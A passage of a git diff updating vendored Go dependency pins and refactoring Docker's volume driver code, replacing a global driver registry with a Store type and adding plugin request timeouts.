+github.com/Microsoft/hcsshim v0.6.11 +github.com/Microsoft/go-winio v0.4.7 github.com/docker/libtrust 9cbd2a1374f46905c68a4eb3694a130610adc62a github.com/go-check/check 4ed411733c5785b40214c70bce814c3a3a689609 https://github.com/cpuguy83/check.git +github.com/golang/gddo 9b12a26f3fbd7397dee4e20939ddca719d840d2a github.com/gorilla/context v1.1 github.com/gorilla/mux v1.1 +github.com/Microsoft/opengcs v0.3.6 github.com/kr/pty 5cf931ef8f -github.com/mattn/go-shellwords v1.0.0 -github.com/mattn/go-sqlite3 v1.1.0 +github.com/mattn/go-shellwords v1.0.3 +github.com/sirupsen/logrus v1.0.3 github.com/tchap/go-patricia v2.2.6 github.com/vdemeester/shakers 24d7f1d6a71aa5d9cbe7390e4afb66b7eef9e1b3 -# forked golang.org/x/net package includes a patch for lazy loading trace templates -golang.org/x/net 2beffdc2e92c8a3027590f898fe88f69af48a3f8 https://github.com/tonistiigi/net.git -golang.org/x/sys 8f0908ab3b2457e2e15403d3697c9ef5cb4b57a9 -github.com/docker/go-units 8a7beacffa3009a9ac66bad506b18ffdd110cf97 -github.com/docker/go-connections ecb4cb2dd420ada7df7f2593d6c25441f65f69f2 +golang.org/x/net 0ed95abb35c445290478a5348a7b38bb154135fd +golang.org/x/sys 37707fdb30a5b38865cfb95e5aab41707daec7fd +github.com/docker/go-units 9e638d38cf6977a37a8ea0078f3ee75a7cdb2dd1 +github.com/docker/go-connections 7beb39f0b969b075d1325fecb092faf27fd357b6 +golang.org/x/text f72d8390a633d5dfb0cc84043294db9f6c935756 +gotest.tools v2.1.0 +github.com/google/go-cmp v0.2.0 github.com/RackSec/srslog 456df3a81436d29ba874f3590eeeee25d666f8a5 -github.com/imdario/mergo 0.2.1 +github.com/imdario/mergo v0.3.5 +golang.org/x/sync fd80eb99c8f653c847d294a001bdf2a3a6f768f5 + +# buildkit +github.com/moby/buildkit dbf67a691ce77023a0a5ce9b005298631f8bbb4e +github.com/tonistiigi/fsutil 8abad97ee3969cdf5e9c367f46adba2c212b3ddb +github.com/grpc-ecosystem/grpc-opentracing 8e809c8a86450a29b90dcc9efbf062d0fe6d9746 +github.com/opentracing/opentracing-go 1361b9cd60be79c4c3a7fa9841b3c132e40066a7 +github.com/google/shlex 6f45313302b9c56850fc17f99e40caebce98c716 +github.com/opentracing-contrib/go-stdlib b1a47cfbdd7543e70e9ef3e73d0802ad306cc1cc +github.com/mitchellh/hashstructure 2bca23e0e452137f789efbc8610126fd8b94f73b #get libnetwork packages -github.com/docker/libnetwork 45b40861e677e37cf27bc184eca5af92f8cdd32d -github.com/docker/go-events 18b43f1bc85d9cdd42c05a6cd2d444c7a200a894 + +# When updating, also update LIBNETWORK_COMMIT in hack/dockerfile/install/proxy accordingly +github.com/docker/libnetwork 19279f0492417475b6bfbd0aa529f73e8f178fb5 +github.com/docker/go-events 9461782956ad83b30282bf90e31fa6a70c255ba9 github.com/armon/go-radix e39d623f12e8e41c7b5529e9a9dd67a1e2261f80 github.com/armon/go-metrics eb0af217e5e9747e41dd5303755356b62d28e3ec github.com/hashicorp/go-msgpack 71c2886f5a673a35f909803f38ece5810165097b -github.com/hashicorp/memberlist 88ac4de0d1a0ca6def284b571342db3b777a4c37 +github.com/hashicorp/memberlist 3d8438da9589e7b608a83ffac1ef8211486bcb7c +github.com/sean-/seed e2103e2c35297fb7e17febb81e49b312087a2372 +github.com/hashicorp/go-sockaddr acd314c5781ea706c710d9ea70069fd2e110d61d github.com/hashicorp/go-multierror fcdddc395df1ddf4247c69bd436e84cfa0733f7e github.com/hashicorp/serf 598c54895cc5a7b1a24a398d635e8c0ea0959870 github.com/docker/libkv 1d8431073ae03cdaedb198a89722f3aab6d418ef github.com/vishvananda/netns 604eaf189ee867d8c147fafc28def2394e878d25 -github.com/vishvananda/netlink 482f7a52b758233521878cb6c5904b6bd63f3457 -github.com/BurntSushi/toml f706d00e3de6abe700c994cdd545a1a4915af060 +github.com/vishvananda/netlink b2de5d10e38ecce8607e6b438b6d174f389a004e + +# When updating, consider updating TOMLV_COMMIT in hack/dockerfile/install/tomlv accordingly +github.com/BurntSushi/toml a368813c5e648fee92e5f6c30e3944ff9d5e8895 github.com/samuel/go-zookeeper d0e0d8e11f318e000a8cc434616d69e329edc374 github.com/deckarep/golang-set ef32fa3046d9f249d399f98ebaf9be944430fd1d -github.com/coreos/etcd 3a49cbb769ebd8d1dd25abb1e83386e9883a5707 +github.com/coreos/etcd v3.2.1 +github.com/coreos/go-semver v0.2.0 github.com/ugorji/go f1f1a805ed361a0e078bb537e4ea78cd37dcf065 github.com/hashicorp/consul v0.5.2 github.com/boltdb/bolt fff57c100f4dea1905678da7e90d92429dff2904 -github.com/miekg/dns 75e6e86cc601825c5dbcd4e0c209eab180997cd7 +github.com/miekg/dns v1.0.7 +github.com/ishidawataru/sctp 07191f837fedd2f13d1ec7b5f885f0f3ec54b1cb # get graph and distribution packages -github.com/docker/distribution 28602af35aceda2f8d571bad7ca37a54cf0250bc -github.com/vbatts/tar-split v0.10.1 +github.com/docker/distribution 83389a148052d74ac602f5f1d62f86ff2f3c4aa5 +github.com/vbatts/tar-split v0.10.2 +github.com/opencontainers/go-digest v1.0.0-rc1 # get go-zfs packages github.com/mistifyio/go-zfs 22c9b32c84eb0d0c6f4043b6e90fc94073de92fa github.com/pborman/uuid v1.0 -# get desired notary commit, might also need to be updated in Dockerfile -github.com/docker/notary v0.4.2 +google.golang.org/grpc v1.12.0 -google.golang.org/grpc v1.0.2 -github.com/miekg/pkcs11 df8ae6ca730422dba20c768ff38ef7d79077a59f -github.com/docker/go v1.5.1-1-1-gbaf439e -github.com/agl/ed25519 d2b94fd789ea21d12fac1a4443dd3a3f79cda72c - -# When updating, also update RUNC_COMMIT in hack/dockerfile/binaries-commits accordingly -github.com/opencontainers/runc 9df8b306d01f59d3a8029be411de015b7304dd8f https://github.com/docker/runc.git # libcontainer -github.com/opencontainers/runtime-spec 1c7c27d043c2a5e513a44084d2b10d77d1402b8c # specs +# This does not need to match RUNC_COMMIT as it is used for helper packages but should be newer or equal +github.com/opencontainers/runc ad0f5255060d36872be04de22f8731f38ef2d7b1 +github.com/opencontainers/runtime-spec v1.0.1 +github.com/opencontainers/image-spec v1.0.1 github.com/seccomp/libseccomp-golang 32f571b70023028bd57d9288c20efbcb237f3ce0 + # libcontainer deps (see src/github.com/opencontainers/runc/Godeps/Godeps.json) -github.com/coreos/go-systemd v4 +github.com/coreos/go-systemd v17 github.com/godbus/dbus v4.0.0 github.com/syndtr/gocapability 2c00daeb6c3b45114c80ac44119e7b8801fdd852 -github.com/golang/protobuf 1f49d83d9aa00e6ce4fc8258c71cc7786aec968a +github.com/golang/protobuf v1.1.0 # gelf logging driver deps -github.com/Graylog2/go-gelf aab2f594e4585d43468ac57287b0dece9d806883 +github.com/Graylog2/go-gelf 4143646226541087117ff2f83334ea48b3201841 -github.com/fluent/fluent-logger-golang v1.2.1 +github.com/fluent/fluent-logger-golang v1.3.0 # fluent-logger-golang deps -github.com/philhofer/fwd 899e4efba8eaa1fea74175308f3fae18ff3319fa -github.com/tinylib/msgp 75ee40d2601edf122ef667e2a07d600d4c44490c +github.com/philhofer/fwd 98c11a7a6ec829d672b03833c3d69a7fae1ca972 +github.com/tinylib/msgp 3b556c64540842d4f82967be066a7f7fffc3adad # fsnotify -github.com/fsnotify/fsnotify v1.2.11 +github.com/fsnotify/fsnotify 4da3e2cfbabc9f751898f250b49f2439785783a1 # awslogs deps -github.com/aws/aws-sdk-go v1.4.22 -github.com/go-ini/ini 060d7da055ba6ec5ea7a31f116332fe5efa04ce0 +github.com/aws/aws-sdk-go v1.12.66 +github.com/go-ini/ini v1.25.4 github.com/jmespath/go-jmespath 0b12d6b521d83fc7f755e7cfc1b1fbdd35a01a74 # logentries -github.com/bsphere/le_go d3308aafe090956bc89a65f0769f58251a1b4f03 +github.com/bsphere/le_go 7a984a84b5492ae539b79b62fb4a10afc63c7bcf # gcplogs deps -golang.org/x/oauth2 2baa8a1b9338cf13d9eeb27696d761155fa480be -google.golang.org/api dc6d2353af16e2a2b0ff6986af051d473a4ed468 -google.golang.org/cloud dae7e3d993bc3812a2185af60552bb6b847e52a0 - -# native credentials -github.com/docker/docker-credential-helpers f72c04f1d8e71959a6d103f808c50ccbad79b9fd +golang.org/x/oauth2 ec22f46f877b4505e0117eeaab541714644fdd28 +google.golang.org/api de943baf05a022a8f921b544b7827bacaba1aed5 +go.opencensus.io v0.11.0 +cloud.google.com/go v0.23.0 +github.com/googleapis/gax-go v2.0.0 +google.golang.org/genproto 694d95ba50e67b2e363f3483057db5d4910c18f9 # containerd -github.com/docker/containerd aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1 -github.com/tonistiigi/fifo 1405643975692217d6720f8b54aeee1bf2cd5cf4 +github.com/containerd/containerd 63522d9eaa5a0443d225642c4b6f4f5fdedf932b +github.com/containerd/fifo 3d5202aec260678c48179c56f40e6f38a095738c +github.com/containerd/continuity d3c23511c1bf5851696cba83143d9cbcd666869b +github.com/containerd/cgroups fe281dd265766145e943a034aa41086474ea6130 +github.com/containerd/console 9290d21dc56074581f619579c43d970b4514bc08 +github.com/containerd/go-runc f271fa2021de855d4d918dbef83c5fe19db1bdd +github.com/containerd/typeurl f6943554a7e7e88b3c14aad190bf05932da84788 +github.com/stevvooe/ttrpc d4528379866b0ce7e9d71f3eb96f0582fc374577 +github.com/gogo/googleapis 08a7655d27152912db7aaf4f983275eaf8d128ef # cluster -github.com/docker/swarmkit 1c7f003d75f091d5f7051ed982594420e4515f77 -github.com/golang/mock bd3c8e81be01eef76d4b503f5e687d2d1354d2d9 -github.com/gogo/protobuf v0.3 +github.com/docker/swarmkit edd5641391926a50bc5f7040e20b7efc05003c26 +github.com/gogo/protobuf v1.0.0 github.com/cloudflare/cfssl 7fb22c8cba7ecaf98e4082d22d65800cf45e042a +github.com/fernet/fernet-go 1b2437bc582b3cfbb341ee5a29f8ef5b42912ff2 github.com/google/certificate-transparency d90e65c3a07988180c5b1ece71791c0b6506826e -golang.org/x/crypto 3fbbcd23f1cb824e69491a5930cfeff09b12f4d2 +golang.org/x/crypto 1a580b3eff7814fc9b40602fd35256c63b50f491 golang.org/x/time a4bde12657593d5e90d0533a3e4fd95e635124cb -github.com/mreiferson/go-httpclient 63fe23f7434723dc904c901043af07931f293c47 -github.com/hashicorp/go-memdb 608dda3b1410a73eaf3ac8b517c9ae7ebab6aa87 -github.com/hashicorp/go-immutable-radix 8e8ed81f8f0bf1bdd829593fdd5c29922c1ea990 +github.com/hashicorp/go-memdb cb9a474f84cc5e41b273b20c6927680b2a8776ad +github.com/hashicorp/go-immutable-radix 826af9ccf0feeee615d546d69b11f8e98da8c8f1 git://github.com/tonistiigi/go-immutable-radix.git github.com/hashicorp/golang-lru a0d98a5f288019575c6d1f4bb1573fef2d1fcdc4 github.com/coreos/pkg fa29b1d70f0beaddd4c7021607cc3c3be8ce94b8 github.com/pivotal-golang/clock 3fd3c1944c59d9742e1cd333672181cd1a6f9fa0 @@ -119,22 +142,23 @@ github.com/beorn7/perks 4c0e84591b9aa9e6dcfdf3e020114cd81f89d5f9 github.com/prometheus/client_model fa8ad6fec33561be4280a8f0514318c79d7f6cb6 github.com/prometheus/common ebdfc6da46522d58825777cf1f90490a5b1ef1d8 github.com/prometheus/procfs abf152e5f3e97f2fafac028d2cc06c1feb87ffa5 -bitbucket.org/ww/goautoneg 75cd24fc2f2c2a2088577d12123ddee5f54e0675 -github.com/matttproud/golang_protobuf_extensions fc2b8d3a73c4867e51861bbdd5ae3c1f0869dd6a +github.com/matttproud/golang_protobuf_extensions v1.0.0 github.com/pkg/errors 839d9e913e063e28dfd0e6c7b7512793e0a48be9 +github.com/grpc-ecosystem/go-grpc-prometheus 6b7015e65d366bf3f19b2b2a000a831940f0f7e0 # cli -github.com/spf13/cobra v1.5 https://github.com/dnephin/cobra.git -github.com/spf13/pflag dabebe21bf790f782ea4c7bbd2efc430de182afd +github.com/spf13/cobra v0.0.3 +github.com/spf13/pflag v1.0.1 github.com/inconshreveable/mousetrap 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75 -github.com/flynn-archive/go-shlex 3f9db97f856818214da2e1057f8ad84803971cff +github.com/Nvveen/Gotty a8b993ba6abdb0e0c12b0125c603323a71c7790c https://github.com/ijc25/Gotty # metrics -github.com/docker/go-metrics 86138d05f285fd9737a99bee2d9be30866b59d72 - -# composefile -github.com/mitchellh/mapstructure f3009df150dadf309fdee4a54ed65c124afad715 -github.com/xeipuuv/gojsonpointer e0fe6f68307607d540ed8eac07a342c33fa1b54a -github.com/xeipuuv/gojsonreference e02fc20de94c78484cd5ffb007f8af96be030a45 -github.com/xeipuuv/gojsonschema 93e72a773fade158921402d6a24c819b48aba29d -gopkg.in/yaml.v2 a83829b6f1293c91addabc89d0571c246397bbf4 +github.com/docker/go-metrics d466d4f6fd960e01820085bd7e1a24426ee7ef18 + +github.com/opencontainers/selinux b29023b86e4a69d1b46b7e7b4e2b6fda03f0b9cd + + +# archive/tar (for Go 1.10, see https://github.com/golang/go/issues/24787) +# mkdir -p ./vendor/archive +# git clone -b go-1.10 --depth=1 git@github.com:kolyshkin/go-tar.git ./vendor/archive/tar +# vndr # to clean up test files diff --git a/vendor/github.com/docker/docker/volume/drivers/adapter.go b/vendor/github.com/docker/docker/volume/drivers/adapter.go index 62ef7dfe60..f6ee07a006 100644 --- a/vendor/github.com/docker/docker/volume/drivers/adapter.go +++ b/vendor/github.com/docker/docker/volume/drivers/adapter.go @@ -1,12 +1,12 @@ -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "errors" - "path/filepath" "strings" + "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/volume" + "github.com/sirupsen/logrus" ) var ( @@ -15,9 +15,9 @@ var ( type volumeDriverAdapter struct { name string - baseHostPath string + scopePath func(s string) string capabilities *volume.Capability - proxy *volumeDriverProxy + proxy volumeDriver } func (a *volumeDriverAdapter) Name() string { @@ -29,10 +29,10 @@ func (a *volumeDriverAdapter) Create(name string, opts map[string]string) (volum return nil, err } return &volumeAdapter{ - proxy: a.proxy, - name: name, - driverName: a.name, - baseHostPath: a.baseHostPath, + proxy: a.proxy, + name: name, + driverName: a.name, + scopePath: a.scopePath, }, nil } @@ -40,13 +40,6 @@ func (a *volumeDriverAdapter) Remove(v volume.Volume) error { return a.proxy.Remove(v.Name()) } -func hostPath(baseHostPath, path string) string { - if baseHostPath != "" { - path = filepath.Join(baseHostPath, path) - } - return path -} - func (a *volumeDriverAdapter) List() ([]volume.Volume, error) { ls, err := a.proxy.List() if err != nil { @@ -56,11 +49,11 @@ func (a *volumeDriverAdapter) List() ([]volume.Volume, error) { var out []volume.Volume for _, vp := range ls { out = append(out, &volumeAdapter{ - proxy: a.proxy, - name: vp.Name, - baseHostPath: a.baseHostPath, - driverName: a.name, - eMount: hostPath(a.baseHostPath, vp.Mountpoint), + proxy: a.proxy, + name: vp.Name, + scopePath: a.scopePath, + driverName: a.name, + eMount: a.scopePath(vp.Mountpoint), }) } return out, nil @@ -78,12 +71,13 @@ func (a *volumeDriverAdapter) Get(name string) (volume.Volume, error) { } return &volumeAdapter{ - proxy: a.proxy, - name: v.Name, - driverName: a.Name(), - eMount: v.Mountpoint, - status: v.Status, - baseHostPath: a.baseHostPath, + proxy: a.proxy, + name: v.Name, + driverName: a.Name(), + eMount: v.Mountpoint, + createdAt: v.CreatedAt, + status: v.Status, + scopePath: a.scopePath, }, nil } @@ -100,7 +94,7 @@ func (a *volumeDriverAdapter) getCapabilities() volume.Capability { if err != nil { // `GetCapabilities` is a not a required endpoint. // On error assume it's a local-only driver - logrus.Warnf("Volume driver %s returned an error while trying to query its capabilities, using default capabilties: %v", a.name, err) + logrus.WithError(err).WithField("driver", a.name).Debug("Volume driver returned an error while trying to query its capabilities, using default capabilities") return volume.Capability{Scope: volume.LocalScope} } @@ -111,7 +105,7 @@ func (a *volumeDriverAdapter) getCapabilities() volume.Capability { cap.Scope = strings.ToLower(cap.Scope) if cap.Scope != volume.LocalScope && cap.Scope != volume.GlobalScope { - logrus.Warnf("Volume driver %q returned an invalid scope: %q", a.Name(), cap.Scope) + logrus.WithField("driver", a.Name()).WithField("scope", a.Scope).Warn("Volume driver returned an invalid scope") cap.Scope = volume.LocalScope } @@ -120,17 +114,19 @@ func (a *volumeDriverAdapter) getCapabilities() volume.Capability { } type volumeAdapter struct { - proxy *volumeDriverProxy - name string - baseHostPath string - driverName string - eMount string // ephemeral host volume path - status map[string]interface{} + proxy volumeDriver + name string + scopePath func(string) string + driverName string + eMount string // ephemeral host volume path + createdAt time.Time // time the directory was created + status map[string]interface{} } type proxyVolume struct { Name string Mountpoint string + CreatedAt time.Time Status map[string]interface{} } @@ -145,7 +141,7 @@ func (a *volumeAdapter) DriverName() string { func (a *volumeAdapter) Path() string { if len(a.eMount) == 0 { mountpoint, _ := a.proxy.Path(a.name) - a.eMount = hostPath(a.baseHostPath, mountpoint) + a.eMount = a.scopePath(mountpoint) } return a.eMount } @@ -156,7 +152,7 @@ func (a *volumeAdapter) CachedPath() string { func (a *volumeAdapter) Mount(id string) (string, error) { mountpoint, err := a.proxy.Mount(a.name, id) - a.eMount = hostPath(a.baseHostPath, mountpoint) + a.eMount = a.scopePath(mountpoint) return a.eMount, err } @@ -168,6 +164,9 @@ func (a *volumeAdapter) Unmount(id string) error { return err } +func (a *volumeAdapter) CreatedAt() (time.Time, error) { + return a.createdAt, nil +} func (a *volumeAdapter) Status() map[string]interface{} { out := make(map[string]interface{}, len(a.status)) for k, v := range a.status { diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint.go b/vendor/github.com/docker/docker/volume/drivers/extpoint.go index 576dee8a1b..b2131c20ef 100644 --- a/vendor/github.com/docker/docker/volume/drivers/extpoint.go +++ b/vendor/github.com/docker/docker/volume/drivers/extpoint.go @@ -1,35 +1,27 @@ //go:generate pluginrpc-gen -i $GOFILE -o proxy.go -type volumeDriver -name VolumeDriver -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "fmt" + "sort" "sync" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/locker" getter "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/volume" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -// currently created by hand. generation tool would generate this like: -// $ extpoint-gen Driver > volume/extpoint.go - -var drivers = &driverExtpoint{ - extensions: make(map[string]volume.Driver), - driverLock: &locker.Locker{}, -} - const extName = "VolumeDriver" -// NewVolumeDriver returns a driver has the given name mapped on the given client. -func NewVolumeDriver(name string, baseHostPath string, c client) volume.Driver { - proxy := &volumeDriverProxy{c} - return &volumeDriverAdapter{name: name, baseHostPath: baseHostPath, proxy: proxy} -} - // volumeDriver defines the available functions that volume plugins must implement. // This interface is only defined to generate the proxy objects. // It's not intended to be public or reused. +// nolint: deadcode type volumeDriver interface { // Create a volume with the given name Create(name string, opts map[string]string) (err error) @@ -49,87 +41,75 @@ type volumeDriver interface { Capabilities() (capabilities volume.Capability, err error) } -type driverExtpoint struct { - extensions map[string]volume.Driver - sync.Mutex +// Store is an in-memory store for volume drivers +type Store struct { + extensions map[string]volume.Driver + mu sync.Mutex driverLock *locker.Locker - plugingetter getter.PluginGetter -} - -// RegisterPluginGetter sets the plugingetter -func RegisterPluginGetter(plugingetter getter.PluginGetter) { - drivers.plugingetter = plugingetter + pluginGetter getter.PluginGetter } -// Register associates the given driver to the given name, checking if -// the name is already associated -func Register(extension volume.Driver, name string) bool { - if name == "" { - return false - } - - drivers.Lock() - defer drivers.Unlock() - - _, exists := drivers.extensions[name] - if exists { - return false - } - - if err := validateDriver(extension); err != nil { - return false +// NewStore creates a new volume driver store +func NewStore(pg getter.PluginGetter) *Store { + return &Store{ + extensions: make(map[string]volume.Driver), + driverLock: locker.New(), + pluginGetter: pg, } - - drivers.extensions[name] = extension - - return true } -// Unregister dissociates the name from its driver, if the association exists. -func Unregister(name string) bool { - drivers.Lock() - defer drivers.Unlock() +type driverNotFoundError string - _, exists := drivers.extensions[name] - if !exists { - return false - } - delete(drivers.extensions, name) - return true +func (e driverNotFoundError) Error() string { + return "volume driver not found: " + string(e) } +func (driverNotFoundError) NotFound() {} + // lookup returns the driver associated with the given name. If a // driver with the given name has not been registered it checks if // there is a VolumeDriver plugin available with the given name. -func lookup(name string, mode int) (volume.Driver, error) { - drivers.driverLock.Lock(name) - defer drivers.driverLock.Unlock(name) +func (s *Store) lookup(name string, mode int) (volume.Driver, error) { + if name == "" { + return nil, errdefs.InvalidParameter(errors.New("driver name cannot be empty")) + } + s.driverLock.Lock(name) + defer s.driverLock.Unlock(name) - drivers.Lock() - ext, ok := drivers.extensions[name] - drivers.Unlock() + s.mu.Lock() + ext, ok := s.extensions[name] + s.mu.Unlock() if ok { return ext, nil } - if drivers.plugingetter != nil { - p, err := drivers.plugingetter.Get(name, extName, mode) + if s.pluginGetter != nil { + p, err := s.pluginGetter.Get(name, extName, mode) if err != nil { - return nil, fmt.Errorf("Error looking up volume plugin %s: %v", name, err) + return nil, errors.Wrap(err, "error looking up volume plugin "+name) } - d := NewVolumeDriver(p.Name(), p.BasePath(), p.Client()) + d, err := makePluginAdapter(p) + if err != nil { + return nil, errors.Wrap(err, "error making plugin client") + } if err := validateDriver(d); err != nil { + if mode > 0 { + // Undo any reference count changes from the initial `Get` + if _, err := s.pluginGetter.Get(name, extName, mode*-1); err != nil { + logrus.WithError(err).WithField("action", "validate-driver").WithField("plugin", name).Error("error releasing reference to plugin") + } + } return nil, err } if p.IsV1() { - drivers.Lock() - drivers.extensions[name] = d - drivers.Unlock() + s.mu.Lock() + s.extensions[name] = d + s.mu.Unlock() } return d, nil } - return nil, fmt.Errorf("Error looking up volume plugin %s", name) + return nil, driverNotFoundError(name) } func validateDriver(vd volume.Driver) error { @@ -140,76 +120,116 @@ func validateDriver(vd volume.Driver) error { return nil } -// GetDriver returns a volume driver by its name. -// If the driver is empty, it looks for the local driver. -func GetDriver(name string) (volume.Driver, error) { +// Register associates the given driver to the given name, checking if +// the name is already associated +func (s *Store) Register(d volume.Driver, name string) bool { if name == "" { - name = volume.DefaultDriverName + return false + } + + s.mu.Lock() + defer s.mu.Unlock() + + if _, exists := s.extensions[name]; exists { + return false + } + + if err := validateDriver(d); err != nil { + return false } - return lookup(name, getter.LOOKUP) + + s.extensions[name] = d + return true +} + +// GetDriver returns a volume driver by its name. +// If the driver is empty, it looks for the local driver. +func (s *Store) GetDriver(name string) (volume.Driver, error) { + return s.lookup(name, getter.Lookup) } // CreateDriver returns a volume driver by its name and increments RefCount. // If the driver is empty, it looks for the local driver. -func CreateDriver(name string) (volume.Driver, error) { - if name == "" { - name = volume.DefaultDriverName - } - return lookup(name, getter.ACQUIRE) +func (s *Store) CreateDriver(name string) (volume.Driver, error) { + return s.lookup(name, getter.Acquire) } -// RemoveDriver returns a volume driver by its name and decrements RefCount.. +// ReleaseDriver returns a volume driver by its name and decrements RefCount.. // If the driver is empty, it looks for the local driver. -func RemoveDriver(name string) (volume.Driver, error) { - if name == "" { - name = volume.DefaultDriverName - } - return lookup(name, getter.RELEASE) +func (s *Store) ReleaseDriver(name string) (volume.Driver, error) { + return s.lookup(name, getter.Release) } // GetDriverList returns list of volume drivers registered. // If no driver is registered, empty string list will be returned. -func GetDriverList() []string { +func (s *Store) GetDriverList() []string { var driverList []string - drivers.Lock() - for driverName := range drivers.extensions { + s.mu.Lock() + defer s.mu.Unlock() + for driverName := range s.extensions { driverList = append(driverList, driverName) } - drivers.Unlock() + sort.Strings(driverList) return driverList } // GetAllDrivers lists all the registered drivers -func GetAllDrivers() ([]volume.Driver, error) { +func (s *Store) GetAllDrivers() ([]volume.Driver, error) { var plugins []getter.CompatPlugin - if drivers.plugingetter != nil { + if s.pluginGetter != nil { var err error - plugins, err = drivers.plugingetter.GetAllByCap(extName) + plugins, err = s.pluginGetter.GetAllByCap(extName) if err != nil { return nil, fmt.Errorf("error listing plugins: %v", err) } } var ds []volume.Driver - drivers.Lock() - defer drivers.Unlock() + s.mu.Lock() + defer s.mu.Unlock() - for _, d := range drivers.extensions { + for _, d := range s.extensions { ds = append(ds, d) } for _, p := range plugins { name := p.Name() - ext, ok := drivers.extensions[name] - if ok { + + if _, ok := s.extensions[name]; ok { continue } - ext = NewVolumeDriver(name, p.BasePath(), p.Client()) + ext, err := makePluginAdapter(p) + if err != nil { + return nil, errors.Wrap(err, "error making plugin client") + } if p.IsV1() { - drivers.extensions[name] = ext + s.extensions[name] = ext } ds = append(ds, ext) } return ds, nil } + +func makePluginAdapter(p getter.CompatPlugin) (*volumeDriverAdapter, error) { + if pc, ok := p.(getter.PluginWithV1Client); ok { + return &volumeDriverAdapter{name: p.Name(), scopePath: p.ScopedPath, proxy: &volumeDriverProxy{pc.Client()}}, nil + } + + pa, ok := p.(getter.PluginAddr) + if !ok { + return nil, errdefs.System(errors.Errorf("got unknown plugin instance %T", p)) + } + + if pa.Protocol() != plugins.ProtocolSchemeHTTPV1 { + return nil, errors.Errorf("plugin protocol not supported: %s", p) + } + + addr := pa.Addr() + client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pa.Timeout()) + if err != nil { + return nil, errors.Wrap(err, "error creating plugin client") + } + + return &volumeDriverAdapter{name: p.Name(), scopePath: p.ScopedPath, proxy: &volumeDriverProxy{client}}, nil +} diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go index 428b0752f2..384742ea00 100644 --- a/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go +++ b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go @@ -1,4 +1,4 @@ -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "testing" @@ -7,13 +7,14 @@ import ( ) func TestGetDriver(t *testing.T) { - _, err := GetDriver("missing") + s := NewStore(nil) + _, err := s.GetDriver("missing") if err == nil { t.Fatal("Expected error, was nil") } - Register(volumetestutils.NewFakeDriver("fake"), "fake") + s.Register(volumetestutils.NewFakeDriver("fake"), "fake") - d, err := GetDriver("fake") + d, err := s.GetDriver("fake") if err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy.go b/vendor/github.com/docker/docker/volume/drivers/proxy.go index b23db6258f..8a44faeddc 100644 --- a/vendor/github.com/docker/docker/volume/drivers/proxy.go +++ b/vendor/github.com/docker/docker/volume/drivers/proxy.go @@ -1,15 +1,22 @@ // generated code - DO NOT EDIT -package volumedrivers +package drivers // import "github.com/docker/docker/volume/drivers" import ( "errors" + "time" + "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/volume" ) +const ( + longTimeout = 2 * time.Minute + shortTimeout = 1 * time.Minute +) + type client interface { - Call(string, interface{}, interface{}) error + CallWithOptions(string, interface{}, interface{}, ...func(*plugins.RequestOpts)) error } type volumeDriverProxy struct { @@ -33,7 +40,8 @@ func (pp *volumeDriverProxy) Create(name string, opts map[string]string) (err er req.Name = name req.Opts = opts - if err = pp.Call("VolumeDriver.Create", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Create", req, &ret, plugins.WithRequestTimeout(longTimeout)); err != nil { return } @@ -59,7 +67,8 @@ func (pp *volumeDriverProxy) Remove(name string) (err error) { ) req.Name = name - if err = pp.Call("VolumeDriver.Remove", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Remove", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -86,7 +95,8 @@ func (pp *volumeDriverProxy) Path(name string) (mountpoint string, err error) { ) req.Name = name - if err = pp.Call("VolumeDriver.Path", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Path", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -117,7 +127,8 @@ func (pp *volumeDriverProxy) Mount(name string, id string) (mountpoint string, e req.Name = name req.ID = id - if err = pp.Call("VolumeDriver.Mount", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Mount", req, &ret, plugins.WithRequestTimeout(longTimeout)); err != nil { return } @@ -147,7 +158,8 @@ func (pp *volumeDriverProxy) Unmount(name string, id string) (err error) { req.Name = name req.ID = id - if err = pp.Call("VolumeDriver.Unmount", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Unmount", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -172,7 +184,7 @@ func (pp *volumeDriverProxy) List() (volumes []*proxyVolume, err error) { ret volumeDriverProxyListResponse ) - if err = pp.Call("VolumeDriver.List", req, &ret); err != nil { + if err = pp.CallWithOptions("VolumeDriver.List", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -201,7 +213,8 @@ func (pp *volumeDriverProxy) Get(name string) (volume *proxyVolume, err error) { ) req.Name = name - if err = pp.Call("VolumeDriver.Get", req, &ret); err != nil { + + if err = pp.CallWithOptions("VolumeDriver.Get", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } @@ -228,7 +241,7 @@ func (pp *volumeDriverProxy) Capabilities() (capabilities volume.Capability, err ret volumeDriverProxyCapabilitiesResponse ) - if err = pp.Call("VolumeDriver.Capabilities", req, &ret); err != nil { + if err = pp.CallWithOptions("VolumeDriver.Capabilities", req, &ret, plugins.WithRequestTimeout(shortTimeout)); err != nil { return } diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy_test.go b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go index b78c46a036..79af956333 100644 --- 